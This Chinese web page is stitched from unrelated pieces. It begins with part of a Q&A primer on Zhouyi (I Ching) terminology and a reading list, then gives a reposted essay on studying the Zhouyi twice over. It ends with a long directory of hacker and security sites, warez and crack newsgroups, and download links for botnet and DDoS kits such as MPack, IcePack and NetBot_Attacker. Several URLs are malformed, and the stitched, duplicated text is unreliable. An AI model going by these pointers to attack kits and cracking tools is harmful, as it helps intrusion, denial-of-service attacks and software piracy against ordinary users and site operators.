答:”反对之象”是指将一个六画之象颠倒过来,它就成了一个新的卦体。如《讼》卦颠倒后是《需》卦,它们两卦互为”反对之象”。

25、问:何为”六画之象”?
答:内卦外卦(即上下两卦)相重而成为六画之象,这六个爻画(即六十四卦卦体)根据它们的排列分为初爻、二爻、三爻、四爻、五爻,上爻;分成”天”、”地”、”人”等。(关于它们的含义前面已解释,这里不再叙述)。

26、问:何为”爻位之象”?
    答:所谓爻位就是每一爻在卦中所处的位置,根据它们所处的不同位置,其所象征的内容亦不同。如初爻之象,象征事物的开始阶段,二爻象征事物的变化阶段,三爻象征发展阶段,四爻象征进步发展阶段,五爻象征成功阶段,上爻象征发展到尽头。如果以六爻表示行政机关里不同级别人物,初爻象征办事员;二爻象征科员;三爻象征科长;四爻象征处长;五爻象征局长;六爻象征顾问。
27、问:何谓”承”、”乘”?
答:”承”、”乘”是指在一卦中,相邻的两个爻,上方的爻,对下方的爻是”承”;下方的爻,对上方的爻是”乘”。

28、问:何谓”比”?
答:”比”是两个相邻的爻,有一种相亲密的关系,当然必须是阴与阳,才有亲近感。如”初爻”与”二爻”,”二爻”与”三爻”,”三爻”与”四爻”,”四爻”与”五爻”,”五爻”与”上爻”相比。

29、问:何谓”时”、”时义”、”时用”?
答:所谓”时”,是说根据事物所处的不同时间、地点等条件,预测吉凶,以决定进退。
    ”时义”是说为卦的时间意义。
    ”时用”是说为卦的时间效用。

30、问:何谓”卦主”?
答:”卦主”是说在一卦中,有一爻占据该卦的主导地位,这一爻就是卦主。物以稀为贵,如五阴一阳卦,则阳爻为卦主,五阳一阴卦,则阴爻为卦主。
31、问:何谓”卦变”、”爻变”?
答:”卦变”是说某卦是从某卦而来的,这种卦与卦之间的变化关系,称为”卦变”。
   ”爻变”一是指阴阳爻自身性质的变化,即阴变阳或阳变阴;二是指一爻与另一爻的互相易位所引起的变化。

32、问:何谓”旁通”?
答:”旁通”是说一卦与另一卦相对应的爻相好相反。

33、问:请解释一下”吉”、”无咎”、”吝”、”凶”等的判断辞?
答:”吉”是吉祥。”吉”又分吉、初吉、贞吉、大吉、元吉。
   ”无咎”是没有灾难、过错,虽然不是吉,但也不是凶。”咎”又分为咎、匪咎、何咎、无咎。
“悔”是后悔,困厄。”悔”有有悔、无悔、悔亡、悔有悔。
“吝”是羞辱,艰难。虽然不是凶,但也是恶运。”吝”又分吝、小吝、终吝、贞吝。
“凶”是凶恶,凶险。”凶”有凶、终凶、有凶、贞凶。

34、问:请解释一下”元、亨、利、贞”四字?
答:”元”有大与始的含意。”元”又分元吉、元亨、元夫。
   ”亨”是通的意思。”亨”又分亨、小亨、元亨。
   ”利”是祥和。”利”又分无不利、无所利、利某或不利某、利贞。
   ”贞”是正与固的意思。”贞”又分贞吉、贞凶、贞厉、可贞、利贞。
有关”元、亨、利、贞”及”吉、无咎、吝、凶”的详细解释请参看《周易古经今注》等有关篇章。

35、问:请谈谈《周易》的四个基本要素?
答:”象、数、理、占”是历代易学的四个基本要素。
   ”象”谓卦爻之象,指卦爻画所表征的物象及物象状态。
“数”是指在筮占中,带有算术演算或数学运算性质的分数道具,以及由分数道具所求得的各不同数值,及其奇偶之别。
“理”有义理与易理之分。易理就是《易》之理。指由《周易》及易学的一整套独特语言与范畴所表达的,并借助《周易》及易学所独具的象与数或象数模式所展示的,宇宙间一切天人宇宙之理。义理是指由卦爻象数及卦爻辞所引发的人事之理。
“占”即占筮。

《周易入门35问》主要参考书目

《占易秘解》:清.张丙哲
《易隐》:清.曹九锡
《紫微斗数》:宋.陈抟
《邵子神数》:宋.邵雍 邵康节
《子平真诠:清.沈孝瞻
《河洛理数》:宋.陈抟 邵康节
《滴天髓》:明.刘伯温
《卜筮正宗》:清.王洪绪
《神峰通考》:明.张楠
《周易尚氏学》:清.尚秉和
《周易与中医学》:杨力
《白话易经》:孙振声
《周易概论》:刘大钧
《周易古经白话解》:刘大钧 林忠军
《周易传文白话解》:刘大钧 林忠军
《实用易经预测方法》:冯精志
《易经杂说》:南怀瑾
《周易研究》杂志:中国周易学会、山东大学主办
《破释周易》:韩永贤
《周易与预测学指南》:廖墨香
《周易与现代经济预测》:廖墨香
《周易与预测学》:邵伟华
《大易集要》:刘大钧主编 齐鲁书社出版
《纳甲筮法》:刘大钧

周易入门(转载)

    越神秘的东西,俺就越有兴趣。

  于是,友人问:你怎么不研究飞碟去?

  俺回答:飞碟哪有周易好玩儿!

  友人又说:看来你喜欢算命啊?

  俺佯怒:谁他妈告诉你周易就是算命的?!

  友人立即用鄙夷的眼光扫视:不是算命的,那有啥好研究的?

  嗯,这个问题嘛……仁者见仁,智者见智咯。

  话说回来,俺这点文化,哪有资格套用“研究”二字,能先做个入门学习就很不错了!所谓活到老,学到老,俺这么年轻,多学些东西什么时候都不会有害嘛——不过,这个道理跟友人是说不通的,因为他们貌似没俺这么“好学”。(反正损失的不是俺,窃喜中

  于是,易中天老师说学习新知识首先要弄懂的三个问题来了:一、为什么要学?二、学什么?三、怎么学?

  那么,是不是我们做任何事情都得有目的?都得有用意?都得有好处?——得到大多数的回答:那当然!没目的,没好处,你学他干吗?

  没法子,俺也得赶紧找个堂而皇之的理由才行。

  恰好看到某书中引用郭沫若在《中国古代社会研究》中的话:“《周易》是一座神秘的殿堂。因为它自己是一些神秘的砖块——八卦——所砌成。同时,又加以后人三圣四圣的几尊偶像的塑造,于是,这座殿堂一直到二十世纪的现代都还发着神秘的幽光。神秘作为神秘而盲目地赞扬或规避都是所以神秘其神秘。神秘最怕太阳,神秘最怕觌面。”短短一段话,竟用了九个“神秘”!

 

  于是乎,古人学习周易,可以“通天下之志,定天下之业,断天下之疑”。

  可是到了俺这里,志向可没那么远大。仅周易中的八卦学说,就可称作中国传统文化的哥德巴赫猜想,几千年来这座堡垒依旧俊秀挺拔。俺渴望作为攻克堡垒大军中的一员,并期望能从“攻克”的过程中感悟为人处事之道,真正要能做到,俺就是非常之幸运的了!

  既然如此,我们应该从周易中学习什么?

  台湾师范大学教授曾仕强认为:周易,是中国哲学思想的源头。“易”代表变化,《易经》告诉我们,应该如何认知世界,应该如何认知自我,从而做到持经达变、通达乐观。因此,《周易》并不是算命、看风水的,而是讲道理的,而且讲的是未来变化的道理!人必须重视自己的未来,因为过去无法更改,但未来却是不确定的,是可以改变的,而要改变则须遵循一定的道理;这些道理,就是我们应该去学习、去掌握的!其中,最重要的四个字,也是曾教授认为《易经》对后人影响最大的四个字:持经达变。

  “经”是指完整的思想体系,“变”则是圆通地应对事物。因此按照现代的解释,“持经达变”可以理解为按照事物发展的规律,圆通地解决事物变化发展的各种问题,以达到预期的目的。

 

  那么,第三个问题:我们到底该如何学习周易才能“持经达变”呢?

  我们都知道《周易》是由《易经》与《易传》组成,曾教授认为“要学《易经》先读《易传》”,因为我们今天学习《周易》,重点是了解和学习《周易》的思维方式、思想和哲学,而读懂《易传》则对《易经》大有裨益。俺则认为,由于个人学习基础不同、学习条件不同、学习目的不同,学习的方法自然也不尽相同,并没有一条放诸四海皆准的方法。俺查阅不少学者关于“初识周易”该如何入门的论述,觉得吴辛丑先生的观点俺更为赞同。吴先生对初学者的建议有以下五点:

  (一) 由浅入深,精读三五本易学名著

  《周易译注•前言》强调研究《周易》要“从源溯流”, 吴先生则认为学习《周易》要“从流溯源”。所谓“从流溯源”,也就是由浅入深,先读今人的浅易《周易》注本,再读宋代以来的注本,再读唐以前的注本,再去研读《左传》、《国语》筮例。初学者最好先找一本当代人写的浅易注本来读,作为入门的基础,然后再找几本包含《周易》经传训释和易学理论知识的书来读。当代人写的书,吴先生推荐读高亨的《周易古经今注》和《周易大传今注》;古人写的书,读李光地《周易折中》或孔颖达《周易正义》均可。


  (二) 打好古文基础,注意《周易》语言的时代特点和规律

  由于《周易》属于先秦文献典籍,其语言表达符合上古汉语的一般规律。良好的古文基础,将有助于学习和研究《周易》。——当年上学俺没好好学习语文,这下惨咯!


  (三) 掌握易学基本条例和卦爻辞的类型特点

  研究《周易》要掌握易学条例,学习《周易》也要这样。易学条例繁多,初学者掌握基本的与《周易》古经直接相关的条例即可。待入门之后,视学习和研究需要再涉猎其他方面。在研读《周易》经文之前,最好先了解、熟悉一些基本的易学条例。

  学习《周易》还需辨明卦爻辞的不同类型,掌握其功能特点及象征手法。吴先生认为区别象辞和兆辞是很有必要的。能不能区分卦爻辞的不同类型,是衡量有没有读懂《周易》的标尺之一。


  (四) 经、传需要分别对待,以经为主,以传为辅

  《周易》经、传两部分,作者不同,产生时代不同,宜分别对待。尤其在讨论性质和价值问题时,更宜严格区别不同的对象,不可混为一谈。从学习的角度而言,区别《周易》经传也是很有必要的。我们学习《周易》,重点是《周易》古经,难点也在古经。《易传》不过是众多解《易》著作中最早、最系统、最权威的一种。既然《易传》是解释性的著作,是从属于古经的,其价值就不能与古经等量齐观,宜以经为主,以传为辅,以传解经。《易传》解《周易》,主释象数与义理,而对于《周易》经文词句的训诂,并不重视,且有偏离经义与误解之处。吴先生认为,在当前的条件下解读《周易》古经,不必再像古人那样以《易传》为准绳和依归,而要综合利用各种典籍资料(包括简帛《周易》)和古注旧说(包括《易传》),作出新的实事求是的解释。而学习《周易》,也要注意参考利用最新的研究成果,以免陈陈相因,以讹传讹。


  (五) 学、玩结合,归于正道

  《周易》表达思想和哲学的方式很特别,卦爻和与之相关的卦爻辞共同成为思想的载体、哲学的工具。我们要读懂《周易》,要了解《周易》的意蕴,不仅需要了解八卦和六十四卦方面的知识,而且需要了解《易》筮的方法和原理。前人曾有一说:未学《易》,先学筮。意思是,在正式读《周易》之前,要先学占卦。又说:《易》有内外两层功夫。所谓《易》外功夫,就是指表面所看到的卦爻和文辞,主要指文辞的解读;所谓《易》内功夫,就是指对《周易》经文中没有讲到的卦象、爻象以及卜筮原理和方法的了解,大体相当于前面所说的“易学条例”或“义例”。可以这样说,如果没有练好“内功”,是无论如何也读不懂《周易》这本“天书”的。试想一下,去掉各种注释和解说,只保留六十四卦经文,叫一个文科大学生自学《周易》一周,甚至一个月,即使能全文背诵下来,也可能不知所云,最多能记住几句“潜龙勿用”、“群龙无首”而已。总之,了解《周易》的筮法和义例,对学习和研究《周易》具有帮助作用。

  吴先生认为,就学术研究而言,我们应该始终抱一种严肃认真、实事求是的态度。这是《周易》“雅”的一面。另一方面,《周易》也很“俗”,具有实用性,可用于占卦“算命”。我们看古今易学名家,许多人都是深谙《周易》占筮之道的,如宋朱熹,近人尚秉和,今人刘大钧,他们除有书介绍筮法筮例外,亦有高雅学术著作问世,对《周易》研究贡献颇大。我们相信,在现代社会,在精神文明高度发达的今天,很少有人会迷失于《周易》的占筮,进而迷失自我理智。

  因此,吴先生认为好的玩《易》心态应该是:玩一玩,乐一乐;遇“吉”努力进取,居安思危;遇“凶”小心谨慎,稳扎稳打。玩、学结合,归于正道。


  最后,借助《周易》之正道结束本文:

  天行健,君子以自强不息;

  地势坤,君子以厚德载物。

周易入门(转载)

    越神秘的东西,俺就越有兴趣。

  于是,友人问:你怎么不研究飞碟去?

  俺回答:飞碟哪有周易好玩儿!

  友人又说:看来你喜欢算命啊?

  俺佯怒:谁他妈告诉你周易就是算命的?!

  友人立即用鄙夷的眼光扫视:不是算命的,那有啥好研究的?

  嗯,这个问题嘛……仁者见仁,智者见智咯。

  话说回来,俺这点文化,哪有资格套用“研究”二字,能先做个入门学习就很不错了!所谓活到老,学到老,俺这么年轻,多学些东西什么时候都不会有害嘛——不过,这个道理跟友人是说不通的,因为他们貌似没俺这么“好学”。(反正损失的不是俺,窃喜中

  于是,易中天老师说学习新知识首先要弄懂的三个问题来了:一、为什么要学?二、学什么?三、怎么学?

  那么,是不是我们做任何事情都得有目的?都得有用意?都得有好处?——得到大多数的回答:那当然!没目的,没好处,你学他干吗?

  没法子,俺也得赶紧找个堂而皇之的理由才行。

  恰好看到某书中引用郭沫若在《中国古代社会研究》中的话:“《周易》是一座神秘的殿堂。因为它自己是一些神秘的砖块——八卦——所砌成。同时,又加以后人三圣四圣的几尊偶像的塑造,于是,这座殿堂一直到二十世纪的现代都还发着神秘的幽光。神秘作为神秘而盲目地赞扬或规避都是所以神秘其神秘。神秘最怕太阳,神秘最怕觌面。”短短一段话,竟用了九个“神秘”!

 

  于是乎,古人学习周易,可以“通天下之志,定天下之业,断天下之疑”。

  可是到了俺这里,志向可没那么远大。仅周易中的八卦学说,就可称作中国传统文化的哥德巴赫猜想,几千年来这座堡垒依旧俊秀挺拔。俺渴望作为攻克堡垒大军中的一员,并期望能从“攻克”的过程中感悟为人处事之道,真正要能做到,俺就是非常之幸运的了!

  既然如此,我们应该从周易中学习什么?

  台湾师范大学教授曾仕强认为:周易,是中国哲学思想的源头。“易”代表变化,《易经》告诉我们,应该如何认知世界,应该如何认知自我,从而做到持经达变、通达乐观。因此,《周易》并不是算命、看风水的,而是讲道理的,而且讲的是未来变化的道理!人必须重视自己的未来,因为过去无法更改,但未来却是不确定的,是可以改变的,而要改变则须遵循一定的道理;这些道理,就是我们应该去学习、去掌握的!其中,最重要的四个字,也是曾教授认为《易经》对后人影响最大的四个字:持经达变。

  “经”是指完整的思想体系,“变”则是圆通地应对事物。因此按照现代的解释,“持经达变”可以理解为按照事物发展的规律,圆通地解决事物变化发展的各种问题,以达到预期的目的。

 

  那么,第三个问题:我们到底该如何学习周易才能“持经达变”呢?

  我们都知道《周易》是由《易经》与《易传》组成,曾教授认为“要学《易经》先读《易传》”,因为我们今天学习《周易》,重点是了解和学习《周易》的思维方式、思想和哲学,而读懂《易传》则对《易经》大有裨益。俺则认为,由于个人学习基础不同、学习条件不同、学习目的不同,学习的方法自然也不尽相同,并没有一条放诸四海皆准的方法。俺查阅不少学者关于“初识周易”该如何入门的论述,觉得吴辛丑先生的观点俺更为赞同。吴先生对初学者的建议有以下五点:

  (一) 由浅入深,精读三五本易学名著

  《周易译注•前言》强调研究《周易》要“从源溯流”, 吴先生则认为学习《周易》要“从流溯源”。所谓“从流溯源”,也就是由浅入深,先读今人的浅易《周易》注本,再读宋代以来的注本,再读唐以前的注本,再去研读《左传》、《国语》筮例。初学者最好先找一本当代人写的浅易注本来读,作为入门的基础,然后再找几本包含《周易》经传训释和易学理论知识的书来读。当代人写的书,吴先生推荐读高亨的《周易古经今注》和《周易大传今注》;古人写的书,读李光地《周易折中》或孔颖达《周易正义》均可。


  (二) 打好古文基础,注意《周易》语言的时代特点和规律

  由于《周易》属于先秦文献典籍,其语言表达符合上古汉语的一般规律。良好的古文基础,将有助于学习和研究《周易》。——当年上学俺没好好学习语文,这下惨咯!


  (三) 掌握易学基本条例和卦爻辞的类型特点

  研究《周易》要掌握易学条例,学习《周易》也要这样。易学条例繁多,初学者掌握基本的与《周易》古经直接相关的条例即可。待入门之后,视学习和研究需要再涉猎其他方面。在研读《周易》经文之前,最好先了解、熟悉一些基本的易学条例。

  学习《周易》还需辨明卦爻辞的不同类型,掌握其功能特点及象征手法。吴先生认为区别象辞和兆辞是很有必要的。能不能区分卦爻辞的不同类型,是衡量有没有读懂《周易》的标尺之一。


  (四) 经、传需要分别对待,以经为主,以传为辅

  《周易》经、传两部分,作者不同,产生时代不同,宜分别对待。尤其在讨论性质和价值问题时,更宜严格区别不同的对象,不可混为一谈。从学习的角度而言,区别《周易》经传也是很有必要的。我们学习《周易》,重点是《周易》古经,难点也在古经。《易传》不过是众多解《易》著作中最早、最系统、最权威的一种。既然《易传》是解释性的著作,是从属于古经的,其价值就不能与古经等量齐观,宜以经为主,以传为辅,以传解经。《易传》解《周易》,主释象数与义理,而对于《周易》经文词句的训诂,并不重视,且有偏离经义与误解之处。吴先生认为,在当前的条件下解读《周易》古经,不必再像古人那样以《易传》为准绳和依归,而要综合利用各种典籍资料(包括简帛《周易》)和古注旧说(包括《易传》),作出新的实事求是的解释。而学习《周易》,也要注意参考利用最新的研究成果,以免陈陈相因,以讹传讹。


  (五) 学、玩结合,归于正道

  《周易》表达思想和哲学的方式很特别,卦爻和与之相关的卦爻辞共同成为思想的载体、哲学的工具。我们要读懂《周易》,要了解《周易》的意蕴,不仅需要了解八卦和六十四卦方面的知识,而且需要了解《易》筮的方法和原理。前人曾有一说:未学《易》,先学筮。意思是,在正式读《周易》之前,要先学占卦。又说:《易》有内外两层功夫。所谓《易》外功夫,就是指表面所看到的卦爻和文辞,主要指文辞的解读;所谓《易》内功夫,就是指对《周易》经文中没有讲到的卦象、爻象以及卜筮原理和方法的了解,大体相当于前面所说的“易学条例”或“义例”。可以这样说,如果没有练好“内功”,是无论如何也读不懂《周易》这本“天书”的。试想一下,去掉各种注释和解说,只保留六十四卦经文,叫一个文科大学生自学《周易》一周,甚至一个月,即使能全文背诵下来,也可能不知所云,最多能记住几句“潜龙勿用”、“群龙无首”而已。总之,了解《周易》的筮法和义例,对学习和研究《周易》具有帮助作用。

  吴先生认为,就学术研究而言,我们应该始终抱一种严肃认真、实事求是的态度。这是《周易》“雅”的一面。另一方面,《周易》也很“俗”,具有实用性,可用于占卦“算命”。我们看古今易学名家,许多人都是深谙《周易》占筮之道的,如宋朱熹,近人尚秉和,今人刘大钧,他们除有书介绍筮法筮例外,亦有高雅学术著作问世,对《周易》研究贡献颇大。我们相信,在现代社会,在精神文明高度发达的今天,很少有人会迷失于《周易》的占筮,进而迷失自我理智。

  因此,吴先生认为好的玩《易》心态应该是:玩一玩,乐一乐;遇“吉”努力进取,居安思危;遇“凶”小心谨慎,稳扎稳打。玩、学结合,归于正道。


  最后,借助《周易》之正道结束本文:

  天行健,君子以自强不息;

  地势坤,君子以厚德载物。



国外黑客站点大全

http://www.allhack.com
本网站提供了图书馆及下载专区。该图书馆为初学者提供了黑客知识和计算机技术基础知识。下载区包括了扫描工具,FLOOD工具,解密工具,拒绝服务攻击等。
http://www.alw.nih,gov
在安全目录下有大量的安全工具
www.anticode.com
入侵攻击,拒绝服务攻击,密钥记录器,邮件炸弹,最流行的IRC客户程序脚本,扫描器,嗅探器,口令解密器,木马等程序。此网站更新及时,而且维护也很好
www.auscert.org.au
澳大利亚电脑紧急反应小组,包括大量入侵攻击及其工作原理的信息。
www.astalavista.com
一个很棒的黑客工具和入侵攻击的搜索网站
http://bugtraq.com
提供安全及入侵攻击有用信息的数据库
http://cerias.cs.purder.edu
本网站包含非常多的网络安全方面的信息和工具。
http://cert.org
Carngie Mellon大学的计算机紧急反应小组的网站。
http://ciac.llnl.gov
提供病毒信息,及时的电子公告牌,邮件列表,安全源信息,工具和操作系统的站点。
http://cultdeadcow.com
一个黑客组织的主页
ftp.cert.dfn.de
软件下载的FTP站点里面工具多多哦,好象是很老了可惜但是值得学习
http://deny.de
网页包含了大量的攻击方法,文本,脚本和程序,包含大量信息源并为初学者提供了入门知识
http://elitehackers.com
为博学的黑客提供的信息公告牌,是上了等级的黑客去的地方。可找到最新的入侵攻击及对解决办法
http://enslaver.com
FTP列表列出了其所有的入侵攻击及脚本
http://firosoft.com/security/philez
入侵攻击,工具,文本文件在目录下一一列出,并根据不同的操作系统进行分类。
http://first.org
意外事件反应小组的组织
ftp.nec.com
在/pub/securit目录下面包含一个巨大的工具库
ftp.porcupine.org
大量安全工具,没有标签和分类。
ftp.win.tue.nl
在/pub/securit目录下包含巨大的安全工具库
geek-speak.net
一个在计算机安全上致力于whitepaper的站点。
hack.co.za
大量根据操作系统或攻击类型分类的攻击。应该有很多人知道把
hackernews.com
关于黑客组织的每日报道。
hackersclub.com
提供大量的信息资源和文本文件,并保持时时更新
infosyssec.net
大量的新闻来源,从病毒,入侵攻击到安全防范。
infowar.co.uk
该网站主要包括文章,建议和工具
insecure.org
新闻,入侵攻击(win,linux,solaris等系统),安全工具和whiepaper,更新好快
l0pht,com
包含大量关于网络安全和攻击的有用的工具
net,tamu.edu
安全工具在http://net.tamu.edu.network/public.html
packetstorm.securify.com
新闻和入侵攻击的站点,随时更新攻击的数据库。为每一条攻击提供注解。可查询攻击数据库。俺入侵的话,第一个就去查它。真的很好哦““
rootshell.com
提供定制的在不同系统中的攻击。此网站研究的现实大量不同的入侵攻击,还提供可以搜索的数据库及文档
sans.org
SANS研究院的主页,包含大量的研究讨论和认证安全的信息。安全专家有时间应该去看看~
securiteam.com
关于安全问题新闻文章的网站,列出了攻击,工具和各种各样的软件
securityfocus.com
BugTraq主页,提供有用的攻击信息
ussrbak.com
自我探索攻击的站点,自学者的好地方
whitehats.com
包含了一个巨大的黑客工具库
wiretrip.net/rfp
Rainforest Puppy的主页,主要是针对CGI脆弱行的信息和攻击NT的信息
www-arc.com
可供下载的系统和网络扫描器,入侵公告牌 介绍这么多的国外黑客资源现在来一点安全资料,下面是邮件列表安全方面的,下面是更新及时的邮件列表
http://www.ntsecurity.net通过在线签约网页假如NT列表
Alert向mailto:request-alert@iss.net发送邮件,并在邮件的正文中写入Subscribe alert
Bug Traq向mailto:LISTERV@NETSPACE.ORG发送邮件,并在邮件的正文中写入subscribe buy traq
Cert mailto:cert-advisory-request@cert.org并在邮件的正文中写入subscribe
FreeBSD Hackers Digest mailto:Majordomo@FreeBSD.ORG并在邮件的中文中写入subscribe
Happy Hacker Digest mailto:hacker@techbroker.com并在邮件的中文中写入subscribe
Linux security mailto:linux-security-request@redhat.com并在邮件的中文中写入subscribe
Linux Admin mailto:Majordomo@vger,rutgers.edu并在邮件的中文中写入subscribe linux-admin
NTBuy Traq maito:LISTSERV@LISTSERV.NTBUYTRAQ.COM并在邮件的中文中写入SUBSCRIBE 下面是一些新闻组
news://alt.cracks
news://alt.binaries.cracks
news://alt.binaries.cracks.phrozen-crew
news://alt.2600.warez
news://alt.2600.programz
news://alt.warez.ibm-pc
news://alt.binaries.warez.linux
news://alt.binaries.warez.mac
news://alt.binariec.warez.macintosh
国外黑客 http://lsd-pl.net/ LsD的站,最新最有效的exploit 
国外黑客 http://www.s0ftpj.org 提供一些水平很高的小工具 
国外黑客 http://www.w00w00.org/ w00w00组织的主页   
国外黑客 http://www.2600.com/ 2600 Magazine 
国外黑客 www.experts-exchange.com 全球有名的社区 
国外黑客 www.is-it-true.org 类似于FAQ的站点,资源丰富 
国外黑客 www.ussrback.com ussr is back 
国外黑客 www.securiteam.com 非常好的安全文章漏洞利用工具下载站点 
国外黑客 www. neworder.box.sk Box Network team 
国外黑客 www.sysinternals.com sysinternals  
国外黑客 www.blackhat.com Black Hat, Inc 
国外黑客 http://p.ulh.as pulhashttp://www.blackcode.com/http://blog.ziffdavis.com/seltzer
Larry Seltzer是美国eWEEK.com的安全栏目编辑, 有空的时候可以看看他的关于安全方面的想法.
http://www.security.nnov.ru/
俄罗斯一个安全站点
http://www.io.com/~vkp/
VKP的个人主页,linux安全方面的专业人员(程序员).
http://chess.eecs.berkeley.edu/trust/
加州大学伯克利分校”普及安全技术研究小组”
http://linsec.ca/
加拿大一个主要收集linux安全相关的文档资料的站点, 也包括其它类Unix系统如OpenBSD, Mac OS X等.
http://www.rootsecure.net/
一个专门为系统管理员和黑客提供安全新闻的网站,成立于2002年9月8日
http://www.2600.com/http://slashdot.org/http://www.antionline.com/国外安全 http://www.neohapsis.com/ 内容极为丰富
国外安全 http://www.deadly.org/ 大量关于OpenBSD的资料文档教程
国外安全 http://www.guninski.com/ 安全专家Guninski的主页,有大量由系统漏洞
国外安全 http://www.sysinternals.com 有很好的windows下的工具及源代码
国外安全 http://www.securityflaw.com/bible/ 入侵检测等文档整理较好的站点
国外安全 http://www.secinf.net/ 网络安全方面的大量文档
国外安全 http://www.incident-response.org 入侵反应,数据恢复工具等
国外安全 http://www.securityfocus.com/ 安全资料整合最好的站
国外安全 http://www.project.honeynet.org/ 由安全界一帮牛人组织的一个project
国外安全 http://www.packetstormsecurity.com 资料全面的安全站
国外安全 http://www.securityportal.com/ 还可以看看的安全站
国外安全 http://www.ussrback.com/ 比较活跃的安全站
国外安全 http://www.attrition.org/ 内容全面的安全站
国外安全 http://www.wiretrip.net/rfp/2/index.asp rfp的安全主页,提供权威的安全信息
国外安全 http://www.antionline.com/ 有些特色栏目的安全站
国外安全 http://www.eeye.com/ eeye公司的主页,提供权威性的安全建议和工具
国外安全 http://www.insecure.org/ Fyodor的主页,nmap的老家,还有exploit
国外安全 http://www.atstake.com/ @stack公司的主页,提供权威的安全建议
国外安全 http://www.bugnet.com/ 提供漏洞修补

国外黑客 http://lsd-pl.net/ LsD的站,最新最有效的exploit
国外黑客 http://www.s0ftpj.org 提供一些水平很高的小工具
国外黑客 http://phrack.org/ Phrack的主页,经典的黑客技术电子杂志
国外黑客 http://www.w00w00.org/ w00w00组织的主页
国外黑客 http://mixter.void.ru/ Mixter的个人主页,不少有用的工具
国外黑客 http://www.thehackerschoice.com/ THC黑客组织的页面,很好的安全文档和工具
国外黑客 www.win2000mag.net Windows & .NET Magazine Network 绝对专业的站点,文章都是一流的
国外黑客 http://www.2600.com/ 2600 Magazine
国外黑客 www.experts-exchange.com 全球有名的社区
国外黑客 www.is-it-true.org 类似于FAQ的站点,资源丰富
国外黑客 www.mixter.warrior2k.com mixter security
国外黑客 www.liun.hektik.org Long Island our Underground Networks
国外黑客 www.ussrback.com ussr is back
国外黑客 www.securiteam.com 非常好的安全文章漏洞利用工具下载站点
国外黑客 www.lsd-pl.net The Last Stage of Delirium Research Group
国外黑客 www. neworder.box.sk Box Network team
国外黑客 www.sysinternals.com sysinternals
国外黑客 www.webattack.com WebAttack Inc
国外黑客 www.blackhat.com Black Hat, Inc
国外黑客 http://p.ulh.as pulhas

http://www.hack.co.za (国外著名黑客站点,较全的Exploit库)

http://www.phrack.org (经典的黑客技术电子杂志)

http://www.antionline.com (国外经典黑客站点)

http://whitehats.com (白帽子网站,有最新的规则库下载,关于Snort等)

http://lsd-pl.net (发布最新的Exploit程序)

http://packetstormsecurity.com (国外著名漏洞库,有大量exploit程序)

http://oliver.efri.hr/~crv/security/bugs/list.html (有整理好的最新漏洞库供下载)

http://astalavista.box.sk (著名的软件破解网站)

http://www.thehackerschoice.com (THC黑客组织的站点,有很多资料和工具)

http://www.insecure.org (Fyoderr的个人站点,即Nmap的老家)

http://www.ishacker.com (DigitalBrain的个人站点,国内)

http://www.sunx.org (Sunx的个人站点,国内)

http://www.docshow.net (Lyawl的个人站点,国内)
十大再生系统 www.darknet.org.uk/2006/03/10-best-security-live-cd-distros-pen-test-forensics-recovery

百大网安工具 www.sectools.org | www.darknet.org.uk/hack-tools-exploits-feeds

最新安全漏洞 www.rootkit.com | www.packetstormsecurity.org | www.milw0rm.com | www.securiteam.com

安全漏洞扫描 www.nessus.org | www.cirt.net/code/nikto.shtml | www.pentest.it/jikto

黑客必杀暗器 www.metasploit.com | www.bindshell.net/tools | www.nirsoft.net

XSS 跨站攻击 www.xssed.com | www.gnucitizen.org/xssdb/application.htm | www.bindshell.net/tools/beef | www.portcullis-security.com/16.php | http://xss-proxy.sourceforge.net

SQL 注入 www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners | www.sqlpowerinjector.com

僵尸网络 Botnet / 分布式拒绝服务攻击 DDoS
IcePack 白金版 http://forum.xakep.ru/m_961441/tm.htm | www.webfile.ru/1504308
MPack 0.95 www.google.com/search?q=mpack+0.95+icepack
ZUnker 1.4.5 www.tinyurl.com/3co7b8 | www.depositfiles.com/files/1242895
无忧傀儡攻击器 2.0 www.1rmb.com/ddos/News.asp?Class=DDOS%B9%A5%BB%F7%B9%A4%BE%DF
NetBot_Attacker 1.61 www.hackeroo.com/thread.php?fid=3

0day 零时差攻击 / Fuzzers 漏洞检测 www.darknet.org.uk/tag/fuzzing | http://code.google.com/p/flayer

DDoS 攻防论坛 www.hackeroo.com | www.1rmb.com/forum/index.asp
国际黑客论坛 http://sla.ckers.org | http://forums.remote-exploit.org

 

–http://www.milw0rm.com
–http://www.packetstormsecurity.org/
–http://www.frsirt.com/exploits/
–http://www.phreak.org/html/exploits.shtml/
–http://www.smokeronline.de/
–http://g_b_m_x.tripod.com/
–http://www.2600.com/
–http://xisp.org/xfactor.html
–http://www.xisp.org/downloads.html
–http://www.assasin-germany.de/
–http://www.megasecurity.org/Binders.html
–http://biw.rult.at/
–http://www.hoobie.net/brutus/
–http://msgs.securepoint.com/bugtraq/
–http://www.c0rtex.de/links.php
–http://hem.passagen.se/btener/?noframe
–http://www.computec.ch/download.php#cat3
–http://www.mut.ac.th/~b1121625/crack.html
–http://www.blackhat.be/
–http://www.blackhat.be/cst/
–http://www.phreak.org/html/main.shtml
–http://www.diquip.gq.nu/flooders.html
–http://askmatador.com/ep/crews.htm
–http://www.hirosh.tk/
–http://www.euyulio.org/
–http://www.fategate.de/Start.html
–http://www.snapfiles.com/freeware/freeware.html
–http://lists.netsys.com/mailman/listinfo/full-disclosure
–http://www.glocksoft.com/index.htm
–http://www.hackernetwork.de/
–http://www.hacker-toolz.info/
–http://hackergames.net/index.php
–http://www.hackernetwork.de/site/navigation.html
–http://www.elhacker.net/hacking.htm
–http://cleo-and-nacho.com/mainpages/hacking.htm
–http://www.hacking-software.com/
–http://www.beepworld.de/members2/wu-tangclan/hacktools.htm
–http://thinkbig.at/haxor
–http://www.chmaas.handshake.de/
–http://www.hoobie.net/
–http://www.ghcif.de/
–http://www.system7.org/show.php?cat=Flooders
–http://xxx.bittorrent.to/xs2.htm
–http://www.geocities.com/arcardia2000/
–http://www.intellitamper.com/infos.php
–http://www.openwall.com/john/
–http://members.fortunecity.de/anks40erua/key.htm
–http://madmax.deny.de/siteJS/indexJS.htm
–http://www.megasecurity.org/
–http://www.musicbox2002.com/hackprograms.html
–http://www.nethacker.de/
–http://neworder.box.sk/codebox.links.php?key=wwwcrks
–http://www.wizzard100.de/file-db/pafiledb.php?action=viewall
–http://mitglied.lycos.de/CopyrightKiller/PASSWORD.htm
–http://www.phreak.be/
–http://xtremet.deny.de/products.htm
–http://protools.cjb.net/
–http://www.rishabhdara.com/link.php?currentgrp=261
